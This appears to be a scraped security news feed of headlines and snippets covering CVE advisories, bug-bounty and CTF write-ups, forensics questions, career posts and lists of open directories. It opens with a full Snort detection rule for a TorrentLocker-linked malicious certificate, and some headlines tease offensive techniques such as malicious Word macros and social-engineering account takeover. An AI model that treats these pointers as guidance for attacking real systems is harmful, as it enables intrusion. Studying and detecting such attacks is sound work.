    There is an old snort signature which is looking for some pretty specific fields, looks like this: alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:"ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (TorrentLocker? CnC?)"; flow:established,to_client; tls_cert_subject; content:"C=US, ST=Denial, L=Springfield, O=Dis,"; fast_pattern; reference:url,sslbl.abuse.ch; classtype:trojan-activity; sid:2021938; rev:3; metadata:attack_target Client_and_Server, created_at 2015_10_08, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, tag SSL_Malicious_Cert, updated_at 2022_03_13, mitre_tactic_id TA0042, mitre_tactic_name Resource_Development, mitre_technique_id T1587, mitre_technique_name Develop_Capabilities;) As you can see it is loo…
    Default ports opened?
    Hi, using CSF firewall in VPS. Using cPanel for running websites. After installing CSF, these are ports that already opened by default in CSF: Screenshot: https://imgur.com/LAkZPZz Should I leave them open or delete some ports? I know 80, 443, ssh port is required to be open. Then some are web mail port, cphulk, dns port. But if you see the screenshot there are many other port numbers opened by default like port 1, 7. Should I delete? cPanel requires these ports to be open: How to Configure Your Firewall for cPanel & WHM Services | cPanel & WHM Documentation Should I just delete the default ports from CSF and copy paste the ports listed in the cPanel site? submitted by /u/yoyobono [link] [comments]
    TOR isn't cutting it anymore for my online anonymity, what should I do now?
    Since TOR uses several exit nodes worldwide, trying to sign into accounts I exclusively use in TOR for anonymity has suddenly become impractical if not impossible. Each site I try to sign into triggers a demand for a combination of 2-factor authentication, account questions, complex captchas, and then refuses to let me sign in completely. It gets worse when signing into one account requires 2-factor authentication through an email that itself demands another 2-factor authentication for yet another email asking for more 2-factor authentication. Recently, multiple sites just suspended my accounts all at once without cause and I can't stand it anymore. I just want to browse the internet in privacy dammit, I'm not trying to break the law or violate anyone's TOS. What should I do? submitted by /u/hechima_tawashi [link] [comments]
  • Open

    Hell’s Keychain: Supply-Chain Vulnerability in IBM Cloud Databases for Postgres
    Article URL: https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql Comments URL: https://news.ycombinator.com/item?id=33823695 Points: 1 # Comments: 0
  • Open

    CVE-2022-3328: Race condition in snap-confine's must_mkdir_and_open_with_perms()
    Article URL: https://www.qualys.com/2022/11/30/cve-2022-3328/advisory-snap.txt Comments URL: https://news.ycombinator.com/item?id=33823006 Points: 2 # Comments: 0
    macOS Monterey still vulnerable to CVE-2022-40303
    Article URL: https://lapcatsoftware.com/articles/MontereyCVE.html Comments URL: https://news.ycombinator.com/item?id=33817539 Points: 20 # Comments: 0
  • Open

    A Journey into Fuzzing WebAssembly Virtual Machine [BHUSA 2022]
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    opendirindex.opensho.com - feedback
    A few month ago I posted a link to an OD indexer I was making. https://opendirindex.opensho.com/ I found the communities feedback very very valuable in improving the site. So I come back to you guys with another round of questions and want to solicit more of your feedback. My first question is do you feel like the results would be better if they were ordered based on the best results for the search or ordered by the most recent results that meet the search criteria? I ask this question because I'm always afraid that my data will age out as ODs naturally come and go, hence the page currently showing the latest results. However, I am finding that this doesn't necessarily produce the best results for the search. And my second question is very open. What could I do to improve the search results overall? The look and feel of the search page is basically a spreadsheet, which I know isn't ideal. I would like some thoughts from the group on what would serve you guys best. ​ Edit1: My sql server crashed under the load. Edit2: Rebooted errything and its back up now. View Poll submitted by /u/coldmateplus [link] [comments]
    How do I download from this site
    I found this site on the internet that has lots of content, like really a lot! But I can't download anything from it. https://alchemist.cyou Any idea? submitted by /u/xShuOuma [link] [comments]
    Music videos.
    http://80s.lt/Files/Videos/MusicVideos/ submitted by /u/blacksnake791B [link] [comments]
  • Open

    Where’s Klumgongyn? Writeup
    An old friend returns! Continue reading on The Sleuth Sheet »
    How I investigate crypto hacks and security incidents: A-Z
    | Much thanks vice.com for a mention! Continue reading on Medium »
    Lost Down Under Writeup
    Sometimes it’s hard to connect the dots. Continue reading on The Sleuth Sheet »
    Reflets.Info condamné par la justice : plongée au cœur d’un site sulfureux
    Le Tribunal de Commerce de Paris vient de condamner le site activiste Reflets, dans le cadre de l’affaire l’opposant à Altice. En cause… Continue reading on Medium »
    Reflets.Info condamné par la justice : plongée au cœur d’un site sulfureux
    Le Tribunal de Commerce de Paris vient de condamner le site activiste Reflets, dans le cadre de l’affaire l’opposant à Altice. En cause… Continue reading on Medium »
    Ghunt installation and guide to use
    Hi hacker!! Continue reading on Medium »
    Investigate Phone Number In Indonesia
    This post heavily focus on phone number investigation in Indonesia but this method can be used in general too. Continue reading on Medium »
    OSINT analysis  — SpiderFoot & theharvester (Information Gathering)
    In my previous article we discussed ‘Network and Port Scanners’ and before that it was ‘Live host Identification’, moving forward in the… Continue reading on System Weakness »
  • Open

    Cannot parsing nicegram apk in Cellebrite PA.
    Hi, maybe anyone have a solution for parsing nicegram apk in Cellebrite PA (last version) . I have a ffs dump of android cell phone. Nicegram apk is a Telegram client that was installed in suspect phone.Telegram itself is supported by PA after ffs extraction. But Nicegram apk isn't supported by PA . What is reason maybe? submitted by /u/ConsiderationLucky96 [link] [comments]
    Trying to find the URL a file was downloaded from.
    Hi. The users default browser is Chrome so I am using "Hindsight" to see all the users browsing history. I do see in the "URL" column the file that I am looking for except this is what is show in the URL column: blob:null/dd2e4db5-20ab-45df-b0aa-8b183daebc1f and this is the "Data/Value/Path" column: C:\Users\User1\Downloads\Chrome.js I've never seen "blob:null" before in the URL column. I think this is some sort of object blob inside of a iframe which gets automatically downloaded when a user visits that page/site? submitted by /u/antmar9041 [link] [comments]
    Help with memory capture file for a class.
    The scenario is that memory dump that I download is only partial due to the computer hard drive failing during the capture. I am trying to get the file to a state where It can be opened in autopsy to be examined but it currently can not be read by FTK (the point of the challenge) and can only be opened in HxD. I do have the file but do not know the rules on posting or linking to a file. Hopefully this isn't the complete wrong place to ask, desperate times. submitted by /u/AvocadoCultist [link] [comments]
  • Open

    The Top 8 Bug Hunting Tools for P1 Bug Bounties
    TL;DR- The absolute essentials in bug bounty hunting, from beginner level to advanced pen-testing frameworks for P1 bug bounties. Continue reading on The Gray Area »
    XSS armazenando na sala de aula da Faculdade² + XSS refletido de bônus.
    Se você não me conhece, sou um jovem formado em Análise e Desenvolvimento de Sistemas, sou formado também em Segurança da Informação e… Continue reading on Medium »
    XSS on account.leagueoflegends.com via easyXDM [2016]
    This post contains a chain of vulnerabilities I responsibly disclosed to Riot Games in November of 2016. I’m publicly disclosing it now as… Continue reading on Medium »
    EXPLOTATION / HUNTING OF LOCAL FILE INCLUSION (LFI)
    — — — — — — — — — —— — — KIDNAPSHADOW — — — — — — — -— — — — — — — — Continue reading on Medium »
    88MPH Theft Of Unclaimed MPH Rewards Bugfix Review
    Summary Continue reading on Immunefi »
    Banner grabbing leads to RCE
    What is a Grabbing Attack? Continue reading on Medium »
    From Bug Hunter to Threat Researcher!!
    Assalamu-Alikum Continue reading on Medium »
    IDOR Disclose User Pending Trip Information | Part 01
    Hi Amazing Hackers & Security Enthusiasts, today I am going to write about something very important. Identifying IDOR bugs that lead to… Continue reading on Medium »
    SQL Injection — Application Korlantas POLRI
    April 13, 2021 Continue reading on Medium »
    The Ultimate List of Bug Hunting Resources for Beginners
    TL;DR- If you’re new to cybersecurity, you’ll absolutely want to take a look at one of the highest earning activities for white-hat… Continue reading on The Gray Area »
    Campanha de Bug Bounty
    Visão geral Continue reading on Medium »
  • Open

    Hacking Into Social Media Account using Social Engineering!
    No content preview
    DoS on a Wifi Router — Wifi Hacking #1
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 1] — No Answers :P
    I am so excited about this Cyber Advent from TryHackMe and today the 1st of December is Day 1. TryHackMe has a lot of prizes for this… Continue reading on InfoSec Write-ups »
    pentesting.cloud part 2: “Is there an echo in here?” AWS CTF walkthrough
    No content preview
    SSRF via DNS Rebinding (CVE-2022–4096)
    No content preview
    RAVEN 2 Walkthrough (OSWE like machine )
    No content preview
  • Open

    Hacking Into Social Media Account using Social Engineering!
    No content preview
    DoS on a Wifi Router — Wifi Hacking #1
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 1] — No Answers :P
    I am so excited about this Cyber Advent from TryHackMe and today the 1st of December is Day 1. TryHackMe has a lot of prizes for this… Continue reading on InfoSec Write-ups »
    pentesting.cloud part 2: “Is there an echo in here?” AWS CTF walkthrough
    No content preview
    SSRF via DNS Rebinding (CVE-2022–4096)
    No content preview
    RAVEN 2 Walkthrough (OSWE like machine )
    No content preview
  • Open

    Hacking Into Social Media Account using Social Engineering!
    No content preview
    DoS on a Wifi Router — Wifi Hacking #1
    No content preview
    TryHackMe Advent of Cyber 2022 [Day 1] — No Answers :P
    I am so excited about this Cyber Advent from TryHackMe and today the 1st of December is Day 1. TryHackMe has a lot of prizes for this… Continue reading on InfoSec Write-ups »
    pentesting.cloud part 2: “Is there an echo in here?” AWS CTF walkthrough
    No content preview
    SSRF via DNS Rebinding (CVE-2022–4096)
    No content preview
    RAVEN 2 Walkthrough (OSWE like machine )
    No content preview
  • Open

    Any hiring for a remote penetration tester position.
    I am a certified information systems security professional with 15 years’ experience in planning, designing, implementing, testing, and maintaining complex Information systems who has great interpersonal skills, and the mindset to work under demanding and high-pressure conditions. Currently seeking a position in penetration testing where I can leverage my skillset to add further dept to the team in return gaining knowledge and strengthening the overall security posture. I am well equipped to work remote without interruption. Please DM me My blog: newworldsamuraiexploits@github.io submitted by /u/newworldsamurai3030 [link] [comments]
  • Open

    Stalking inside of your Chromium Browser
    Continue reading on Posts By SpecterOps Team Members »
    Jeeves (HTB — Retired)
    Just for disclaimer purposes this machine is under the retired group of machines. As a consequence, you can access it via a subscription… Continue reading on Medium »
  • Open

    SecWiki News 2022-12-01 Review
    通过网空搜索引擎发现恶意软件控制面板登录页面 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-01 Review
    通过网空搜索引擎发现恶意软件控制面板登录页面 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Looting iOS App’s Cache.db
    Insecure By Default Mobile application assessments diverge somewhat from normal web application assessments as there is an installed client application on a local device to go along with the backend server. Mobile applications can often work offline, and thus have a local store of data. This is commonly in the form of SQLite databases stored... The post Looting iOS App’s Cache.db appeared first on TrustedSec.
  • Open

    CVE-2020-9273 ProFTPd RCE 漏洞分析与利用
    作者:knaithe@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/RJUFhx5F-wI_fmX8McMCiQ 漏洞描述:UAF类型的漏洞,通过伪造pool_rec内存池控制结构,可以篡改函数指针,从而达到任意命令执行。 漏洞修复:https://github.com/proftpd/proftpd/commit/d388f7904d4c9a6d0ea5...
    CVE-2022-22972 VMware Workspace ONE Access 身份认证绕过漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/zVYQQgDjcwJKAnX8SZJ5Cw 漏洞描述 5 月 18 日,VMware 发布了一份公告 ( VMSA-2022-0014 ),以解决多个 VMware 产品中的两个漏洞,其中包括CVE-2022-22972,该漏洞在身份认证处理时存在一定缺陷。远程攻击者可通过伪造相关...
  • Open

    CVE-2020-9273 ProFTPd RCE 漏洞分析与利用
    作者:knaithe@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/RJUFhx5F-wI_fmX8McMCiQ 漏洞描述:UAF类型的漏洞,通过伪造pool_rec内存池控制结构,可以篡改函数指针,从而达到任意命令执行。 漏洞修复:https://github.com/proftpd/proftpd/commit/d388f7904d4c9a6d0ea5...
    CVE-2022-22972 VMware Workspace ONE Access 身份认证绕过漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/zVYQQgDjcwJKAnX8SZJ5Cw 漏洞描述 5 月 18 日,VMware 发布了一份公告 ( VMSA-2022-0014 ),以解决多个 VMware 产品中的两个漏洞,其中包括CVE-2022-22972,该漏洞在身份认证处理时存在一定缺陷。远程攻击者可通过伪造相关...
  • Open

    大事件!密码神器LastPass承认黑客窃取了客户数据
    LastPass公开承认,通过一个新的漏洞,黑客访问了 LastPass 的第三方云存储服务器,并获得了部分客户的关键信息。
    攻击技术研判 | 典型BYOVD利用与Ring0防御削弱技术研判
    本文将对Lazarus在本次攻击事件中的BYOVD技术与防御削弱技术进行分析研判。
    FreeBuf早报 | 一款诈骗软件专门针对发展中国家;Anker 未经用户同意向云端上传信息
    Keralty 跨国医疗机构遭遇勒索软件攻击,扰乱了该公司及其子公司的网站和运营。
    安装量达 1500 万,这些诈骗软件专门针对发展中国家
    以具有欺诈性的条款使用户陷入贷款漩涡,并采用各种方法对借款人进行勒索和骚扰。
    谷歌发现用于部署间谍软件的 Windows 漏洞利用框架
    虽然已经修复,但这些漏洞很可能在野外被用作零日漏洞。
    三大专场,四大论坛 | CIS 2022网安多维时空降临
    2022年12月14日,CIS 2022网安多维时空将准时降临,届时上海主会场、深圳分会场以及线上元宇宙专场将全部呈现给大家。
    澳大利亚数据保护要求
    澳大利亚个人数据保护的主要立法是《隐私法》及其《澳大利亚隐私原则》(“APPs”)。此外,还有《2013年隐私条例》、具有法律约束力的《隐私(信用报告)准则》以及规则和指南。
    一年多才解决!索尼、Lexar 的加密设备供应商泄露敏感数据
    Cybernews 研究小组的发现与 2021 年 12 月研究人员 Sylvain Pelissier 的发现一样令人担忧。
  • Open

    Cache Deception Allows Cache Poisoning
    @bxmbn Continue reading on Medium »

  • Open

    Bypassing The Client Side Encryption To Read Internal Windows Server Files
    Hey, once again it's me abhishekmorla, Continue reading on Medium »
    RAVEN 2 Walkthrough (OSWE like machine )
    Hi! My name is Hashar Mujahid and Today we are going to solve a room from vulnhub which is listed as OSWE like machine by TJ-Null. Continue reading on InfoSec Write-ups »
    ‘PTN’ infosec monthly #6 — InfoSec Updates
    Namaste everyone, Continue reading on Pentester Nepal »
    My Latest XSS Finding, Explained To Beginners | Bug Bounty
    It’s been a while since i posted a writeup so i thought it would be wise to make one for beginners. Continue reading on InfoSec Write-ups »
    Subdomain Takeover
    1. Underlying reason which causes subdomain takeover vulnerabilities Continue reading on Medium »
    Stored XSS at https://www.tiktok.com/
    Hi everyone, Continue reading on Medium »
  • Open

    Neurology Books and Articles
    Part of a Neurofeedback website. Some books and articles are older. https://brainmaster.com/software/pubs/books/ https://brainmaster.com/software/pubs/brain/ submitted by /u/Waft0Afar [link] [comments]
    LLOD 11-30-22 (47 ODs!) (Large List of Open Directories)
    https://mirror.explodie.org http://pitofdespair.randominsanity.org/music/ -removed- http://109.120.203.163/web/ https://bootiemashup.com/wp-content/uploads/ -removed http://3-152splinter.pulsedmedia.com/public-xyzzy/ https://guitarvoice.com/wp-content/uploads/ http://65.186.78.52 / https://theplace4me.org http://188.165.227.112 http://vod.simpletv.eu/media/ http://mediaset.sdasofia.org https://www.dre.vanderbilt.edu/CoSMIC/ https://www.lkgoodwin.com/more_info/ (Takes some time to load) http://eftaylor.com/sands/ https://www.higp.hawaii.edu/~harold/ http://georgenet.net/spectra/ https://web.itu.edu.tr/~ismayilov/ http://support.green.cz/uploads/ https://www.satlab.com/software/ https://freed.ga https://distext.ingeniamc.com https://fnndsc.childrens.harvard.edu/conferences/ https://soybase.org/data/ http://www.zeamap.com/ftp/ https://www.kiloview.com/downloads/ https://bpp.umd.edu/archives/ https://ms4w.com/release/ https://www.escaladethionville.fr/download/ https://www.sinaitemple.org/upcoming_events/programs/mp3/index.php https://www.slyc.org/dirLIST_0.3.0/ http://www.zzygx.cc/dirLIST_0.3.0/ https://www.o-calcpro.com/DOWNLOADS/ http://www.gregpatterson.com/newsletters/ https://www.oekopol.de/archiv/ https://wifi.uevora.pt/drivers/ http://rlillo.educsalud.cl/ -removed- http://download.viernulvier.nl/ http://gingert.net/images/ http://miya.nipah.moe:81/public/ https://www.sindark.com/genre/ https://theswissbay.ch/pdf/ https://www.tvoyo.tv/ckfinder/ http://bison.ihep.su/~kachaev/ http://37.59.40.140 http://idriders.com/temp/ ​ https://pastebin.com/LcGVyNSp submitted by /u/ilikemacsalot [link] [comments]
    A mix of old and new music albums
    144.76.107.125/storage/music/ submitted by /u/__M_N__ [link] [comments]
  • Open

    I created a tool that will scan files with over 100K YARA rules and give you performance metrics, such as Information Gain, for each matching signature
    submitted by /u/pracsec [link] [comments]
  • Open

    HTB OSINT Challenge — Money Flowz
    OSINT CHALLENGE : Frank Vitalik is a hustler, can you figure out where the money flows? Continue reading on Medium »
    MilOsintCTF Writeup
    A Military themed OSINT CTF Continue reading on The Sleuth Sheet »
    OSINT — Метапоисковики и поисковые комбайны.
    Hopain Tools, Inteltechniques, IntelligenceX, Aware OSINT Tools — представляют собой стартовые страницы для десятков поисковых систем… Continue reading on Medium »
  • Open

    Access (HTB — Retired)
    This machine is a retired challenge, that is you will need a VIP subscription to access it. Long story sort, once you finally get the root… Continue reading on Medium »
    Athena OS Distro focused on Cybersecurity
    Dive into a new Pentesting Experience with Athena OS Continue reading on Medium »
    Creating Malicious word documents
    Hi readers, here we will be looking into creating malicious word documents with the intent of running system commands using macro… Continue reading on Medium »
  • Open

    SiriusXM Connected Vehicle Vulnerability
    Article URL: https://twitter.com/samwcyo/status/1597792162485522432 Comments URL: https://news.ycombinator.com/item?id=33807106 Points: 1 # Comments: 0
  • Open

    Campaign Account Balance and History Disclosed in API Response
    LinkedIn disclosed a bug submitted by sachin_kumar_: https://hackerone.com/reports/1587374 - Bounty: $500
    If the website does not impose additional defense against CSRF attacks, failing to use the 'Lax' or 'Strict' values could increase the risk of exposur
    Yelp disclosed a bug submitted by shubhangirathore836: https://hackerone.com/reports/1707680
  • Open

    Multiversity by @wefuzz_io, a collection of amazing resources for Hackers and Developers to learn, develop, showcase and contribute to the future of Web3 Security
    submitted by /u/ant4g0nist [link] [comments]
    New details on commercial spyware vendor Variston
    submitted by /u/YogiBerra88888 [link] [comments]
    Building Policy Gate for DevSecOps using Open Policy Agent
    submitted by /u/nicksthehacker_ [link] [comments]
    SGX.Fail - Overview of SGX Attacks
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-11-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    My Latest XSS Finding, Explained To Beginners | Bug Bounty
    No content preview
    TryHackMe writeup: A cursory analysis of the Jigsaw ransomware
    Ransomware is a threat that sent the computing world into a frenzy. In this article, I will discuss analysing a the Jigsaw stain of it. Continue reading on InfoSec Write-ups »
    Attacktive Directory
    No content preview
    Write-up: Source code disclosure via backup files @ PortSwigger Academy
    No content preview
    Unique Rate limit bypass worth 1800$
    No content preview
  • Open

    My Latest XSS Finding, Explained To Beginners | Bug Bounty
    No content preview
    TryHackMe writeup: A cursory analysis of the Jigsaw ransomware
    Ransomware is a threat that sent the computing world into a frenzy. In this article, I will discuss analysing a the Jigsaw stain of it. Continue reading on InfoSec Write-ups »
    Attacktive Directory
    No content preview
    Write-up: Source code disclosure via backup files @ PortSwigger Academy
    No content preview
    Unique Rate limit bypass worth 1800$
    No content preview
  • Open

    My Latest XSS Finding, Explained To Beginners | Bug Bounty
    No content preview
    TryHackMe writeup: A cursory analysis of the Jigsaw ransomware
    Ransomware is a threat that sent the computing world into a frenzy. In this article, I will discuss analysing a the Jigsaw stain of it. Continue reading on InfoSec Write-ups »
    Attacktive Directory
    No content preview
    Write-up: Source code disclosure via backup files @ PortSwigger Academy
    No content preview
    Unique Rate limit bypass worth 1800$
    No content preview
  • Open

    RAID1
    I got an E01 image from the customer that they claim is utilizing RAID1. RAID1 is supposed to make a mirror copy, no splitting into arrays. Host OS is Server 2019. When they mounted one of the HDs for imaging, none of the partitions are assigned a volume. So they make a full disk image and send it my way. When I get the E01, I am unable to mount. I run the image through Axiom and it carves, not parses, only some artifacts. I look at the image in FTK and it's saying the file system is Solaris/Linux Swap. I look at the partition table in the MBR and confirm that what is recorded in the partition table is Solaris/Linux Swap. More interesting notes are the first partition starts at 63 as opposed to 2048. Is there a specific way we should be imaging this RAID1 HD? Customer has both HDs, but I figured we only needed to image 1 as the second is a mirror copy. Thoughts? Thank you in advanced /r/computerforensics submitted by /u/DeadBirdRugby [link] [comments]
    Commercial FTK
    Anyone here used the commercial version of FTK? is it aorth of buying? I work in a big company and we are adding digital forensics function to our team. Now we are looking for the best tools to start with. one of which is FTK toolkit (basic version). also appreciate any tool suggestions and advice. submitted by /u/DynamicResolution [link] [comments]
    Windows 10 Build 1909 Hash List
    Where can I find a list of hashes for a baseline Windows 10 Build 1909? I remember reading about one but I cant find it on google. submitted by /u/DeadBirdRugby [link] [comments]
  • Open

    FreeBuf早报 | 北约举行年度“网络联盟”演习;我国未成年网民规模达1.91亿
    11月28日,北约举行一年一度的“网络联盟”演习,多个国家参与,意在提高北约网络防御和网络空间“共同作战”能力。
    宏碁五款电脑驱动程序存在漏洞,可导致恶意软件入侵
    宏碁某些笔记本电脑设备的驱动程序存在高危漏洞,可停用UEFI安全启动功能,导致攻击者在启动过程中部署恶意软件。
    应对挑战!元宇宙可能成为 2023 年网络攻击的主要途径
    随着成熟和新兴的面向消费者的恶意网络攻击增加,企业安全团队在 2023 年需要应对的许多挑战。
  • Open

    Build Secure Java Applications With Fuzz Testing
    Today, I want to show you a way how to increase the integrity and functionality of your Java applications with fuzz testing. Continue reading on Medium »
    Code Intelligence Unveils Simple Open-Source Tool to Test Java Applications for Unexpected…
    The CI Fuzz CLI Tool Enables Developers to Find and Fix Functional Bugs and Security Vulnerabilities by Dynamically Generating Millions of… Continue reading on Medium »
  • Open

    Build Secure Java Applications With Fuzz Testing
    Today, I want to show you a way how to increase the integrity and functionality of your Java applications with fuzz testing. Continue reading on Medium »
    Code Intelligence Unveils Simple Open-Source Tool to Test Java Applications for Unexpected…
    The CI Fuzz CLI Tool Enables Developers to Find and Fix Functional Bugs and Security Vulnerabilities by Dynamically Generating Millions of… Continue reading on Medium »
  • Open

    The Burp challenge
    We recently launched the Burp challenge, to give our customers a unique opportunity to demonstrate their skills with Burp Suite Professional. Not only that, but the challenges involved put your web vu
  • Open

    The Burp challenge
    We recently launched the Burp challenge, to give our customers a unique opportunity to demonstrate their skills with Burp Suite Professional. Not only that, but the challenges involved put your web vu
  • Open

    com 组件的从 0 到 1
    作者:0r@nge 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 本文是作者从0到1学习com的一个过程,记录了从初识com到com的武器化利用以及挖掘。com组件博大精深,无论是从开发的角度还是安全的角度都非常值得研究,本文仅作入门贴。 基础知识 对于com的基本认知,摘自头像哥博客。对于com,个人没有系...
    在 Android 中开发 eBPF 程序学习总结(三)
    作者:Hcamael@知道创宇404实验室 日期:2022年11月30日 相关阅读: 在 Android 中开发 eBPF 程序学习总结(一) 在 Android 中开发 eBPF 程序学习总结(二) 在研究uprobe的过程中,发现了Linux内核一个好用的功能。 本来是打算研究一下,怎么写uprobe的代码,写好后怎么部署,然后又是怎么和相应的程序对应上的。但是资料太少了,基本上都是写使...
  • Open

    com 组件的从 0 到 1
    作者:0r@nge 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org 前言 本文是作者从0到1学习com的一个过程,记录了从初识com到com的武器化利用以及挖掘。com组件博大精深,无论是从开发的角度还是安全的角度都非常值得研究,本文仅作入门贴。 基础知识 对于com的基本认知,摘自头像哥博客。对于com,个人没有系...
    在 Android 中开发 eBPF 程序学习总结(三)
    作者:Hcamael@知道创宇404实验室 日期:2022年11月30日 相关阅读: 在 Android 中开发 eBPF 程序学习总结(一) 在 Android 中开发 eBPF 程序学习总结(二) 在研究uprobe的过程中,发现了Linux内核一个好用的功能。 本来是打算研究一下,怎么写uprobe的代码,写好后怎么部署,然后又是怎么和相应的程序对应上的。但是资料太少了,基本上都是写使...
  • Open

    Masters Degree
    I'm IT guy want to ask one thing, Should i go for a masters degree to achieve a senior level post in any IT company?? submitted by /u/zakwan30 [link] [comments]

  • Open

    Big OD of some stunning pictures
    Mostly hirez photos or pictures of views from around the world. Some other misc pictures scattered throughout. Looks safe for work, but didn't verify. https://www.alale.co/uploads/ submitted by /u/BustaKode [link] [comments]
    A stack of wordpress indexes. I went looking for Dorothy Stratten after watching the Chippendales series.
    https://hyperbole.es/wp-content/uploads/ https://www.foundagrave.com/wp-content/uploads/ https://biographymask.com/wp-content/uploads/ https://www.news-people.fr/images/ https://www.taille-age-celebrites.com/wp-content/uploads/-75 https://www.helloastrology.com/wp-content/uploads/?SA https://www.iamnotastalker.com/wp-content/uploads/ Not a cheery subject by any metric but some of it was... frankly a bit macabre. submitted by /u/ringofyre [link] [comments]
    Some hi-res (4k) photos from different events (mostly in Russia)
    3.62GB of hi-res photos (4k) from different events (mostly in Russia) http://195.93.180.8/ A nice portrait of Sergey Lavrov comes as a bonus submitted by /u/GloomyGenius [link] [comments]
  • Open

    Computer Forensic Tool
    What is your top 3 Computer forensic tool (free and paid)? submitted by /u/Big_Moma_Bear [link] [comments]
    Having trouble creating a 'Raw Image' of an android device using FTK Imager!! Help needed!
    The issue is that FTK is not recognizing the android device. Is this because I didn't root the android device? I know rooting an android device helps in acquire raw image file but I'm trying to acquire an image without rooting the device. Is it possible or do I definitely need to root my device? I am actually afraid of data loss thus going for an acquisition without rooting the device. I need to do this for project work and just can only depend on open-source tools and the software available at the university. Can anyone help me with this? submitted by /u/StabbingHeart [link] [comments]
    Notable finding or chasing my tail?
    Does anyone know the significance of the term "leeHolm16" in association with Powershell? I haven't found any relevant http connections associated with it (yet), but am wondering if I'm chasing my tail. It could be default, as it appears date stamped significantly older than the PC itself is. My Google searching has shown troubling results, but if this is a default entry, it's just coincidental. Appreciate any thoughts submitted by /u/ShakeyShooter [link] [comments]
    DF UK Jobs
    Hey, For a new graduate with a degree in DF, would a digital forensic technician be the job to apply for within a police force in the UK? This role doesn’t have a degree listed as essential. Or would I be applying for a digital forensic specialist role within a police force? They seem to mention needing a degree and a few years experience. Just trying to understand where I fit in with no prior experience other than a degree. submitted by /u/sausagefries32 [link] [comments]
  • Open

    Need for speed: static analysis version
    submitted by /u/pabloest [link] [comments]
    Looting Microsoft Configuration Manager
    submitted by /u/1njected [link] [comments]
    Xiongmai IoT Exploitation
    submitted by /u/chicksdigthelongrun [link] [comments]
    Subdomain Enumeration with DNSSEC
    submitted by /u/doitsukara [link] [comments]
    The Art of Bypassing Kerberoast Detections with Orpheus
    submitted by /u/sanitybit [link] [comments]
  • Open

    Stored XSS Payload when sending videos
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1536046 - Bounty: $500
    Any organization's assets pending review can be downloaded
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1787644
    Stored XSS in Dovetale by application of creator
    Shopify disclosed a bug submitted by kun_19: https://hackerone.com/reports/1652046 - Bounty: $1600
    I found some api keys in js files ,huge leak of token addresses and huge amount of js files are not forbidden
    AMBER AI disclosed a bug submitted by orange_h: https://hackerone.com/reports/1787121
  • Open

    had my pc in dmz, is it infected?
    i was selfhosting some stuff like plex/sonarr/nginx proxy manager and some linuxserver.io containers and a minecraft server. i moved my pc to dmz before i figured how to open my ports, but now im having some weird issues with my internet (0.3mbps / 300mbps speedtest, unable to do anything online). my router has been already formatted remotedly from the ISP, and the issue is on the whole network. any ideas? submitted by /u/loseryoda [link] [comments]
    MS student asking about a government job offer
    I finished BS in electrical engineering and I am halfway thru MS. I have received an offer for NSA engineering job. I have a few questions. The work description is great for an entry level engineer. What is it in reality? Are there really so much hardware and software to learn as described on the webpage? After 2 so so internships, it seems the government is offering me a huge feast. Am I expecting too much as a beginner? After about 4-5 years I want to join private sector (as a systems engineer or test engineer). Is that a realistic goal? Do government engineers get overtime? The pay is low and I would like to spend an extra hour or two in the lab everyday if possible. Thanks in advance. submitted by /u/littlewood20 [link] [comments]
    Do you need a degree to become a pen tester?
    Hi. I would like to become a pen tester, and I would like to know if I would need a degree to become one. submitted by /u/AlternativeNo5023 [link] [comments]
    Do you have to be extroverted to be a pen tester?
    Hi. Im curious about if I would have to be extroverted in order to be a pen tester. Im introverted and quite painfully shy. How can I be able to communicate my findings to my clients at a high technical level, and flip the switch from introvert to extrovert when speaking to them? Also how can I be more extroverted, and not be as anxious when speaking to people? I’m in college as well. submitted by /u/AlternativeNo5023 [link] [comments]
    Some questions about an email header
    I've already used an email header analyzer and it doesn't answer the question I have. I work at BigCo.org. I have someone trying to spoof one of my users Mandy@BigCo.org and emailing our Accounts department at [JADAMS@BigCo.org](mailto:JADAMS@BigCO.org) asking accounting to change their auto payments to a different employee bank account. This email did get caught in spam because it failed the dmark, but I want to better understand the header. See header below. Am I correct that someone is trying to use "csavant@mtek.net) [smtp.mailfrom=csavant@mtek.net](mailto:smtp.mailfrom=csavant@mtek.net);" to send the email to us? Does that mean that the MTEK.NET email server was hacked? Is there a way to tell if MTEK.NET is running an exchange server or if they are using a subscriber online serv…
    OpenCTI Requirements
    Got OpenCTI up and running in a cyber range that was an ova image w 4 cores and 16GB Ram. Also have it running on my home lab with Dockers between two Ubuntu boxes, each with 6 cores and 10 GB RAM.... I'm trying to spec out what I would need, hardware/resource-wise, to implement within my organization. It doesn't seem I am hitting any limits within both my installations, but then again I'm only running about 5 connectors, and integrations with our EDR and firewall. Anyone running it in prod...and can relayed what you installed on and what resources you provided? submitted by /u/Deathlord1973 [link] [comments]
    How is TCM security’s mobile app pentesting course?
    Hi. I would like to get into pentesting and I would like to purchase the cyber mentors mobile app pen testing course. It said to have an iPhone or IPad with the IOS 14.7 or less. My iPhone’s IOS updated to the 16.1.1. Will that work for the course or not? If not, then why not? submitted by /u/AlternativeNo5023 [link] [comments]
    Secure E2E File Transfer Product Needed
